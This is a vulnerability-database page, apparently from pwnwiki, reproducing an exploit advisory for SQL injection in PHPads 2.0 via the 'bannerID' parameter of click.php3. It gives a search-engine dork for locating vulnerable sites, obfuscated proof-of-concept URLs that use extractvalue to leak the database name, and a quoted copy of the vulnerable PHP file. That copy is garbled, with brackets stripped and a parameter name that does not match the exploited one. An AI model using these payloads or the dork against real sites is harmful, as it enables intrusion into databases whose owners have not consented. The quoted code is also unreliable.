Loading
0

PHPads 2.0 – ‘click.php3?bannerID’ SQL注入漏洞

免费、自由、人人可编辑的漏洞库

,

EXP

+ Sql Injection on PHPads Version 2.0 based on Pixelledads 1.0 by Nile Flores

+ Date: 05/05/2019

+ Risk: High

+ CWE Number : CWE-89

+ Author: Felipe Andrian Peixoto

+ Vendor Homepage: https://blondish.net/

+ Software Demo : https://github.com/blondishnet/PHPads/blob/master/readme.txt

+ Contact: email protected

+ Tested on: Windows 7 and Gnu/Linux

+ Dork: inurl:"click.php3?bannerID="" // use your brain ;)

+ Exploit : 

        http://host/patch//click.php3?bannerID= SQL Injection

+ Vulnerable File :

	    <?php
		$bannerAdsPath = './ads.dat';
		require './ads.inc.php';
		///////////////////////////////////////
		// Don't Edit Anything Below This Line!
		///////////////////////////////////////
		for ($i = 0; $i < count($ads); $i++) {
			if(ereg('^' .$_GET'id'. '\|\|', $ads$i)) {
				$data = explode('||', $ads$i);
			if ($_SERVER'REMOTE_ADDR' != $bannerAds'blockip') {
					$data PHPADS_ADELEMENT_CLICKTHRUS ++;
			}
				$ads$i = join('||', $data);
				break;
			}
		}
		if (!$dataPHPADS_ADELEMENT_LINK_URI) {
			die();
		}
		writeads();
		Header("Location: ". $dataPHPADS_ADELEMENT_LINK_URI);
		exit;
		?>

+ PoC : 
 
   http://server/phpads/click.php3?bannerID=-1/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
   http:/server/phpAds/click.php3?bannerID=-1/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
   
+ EOF
            

免费、自由、人人可编辑的漏洞库--pwnwiki.com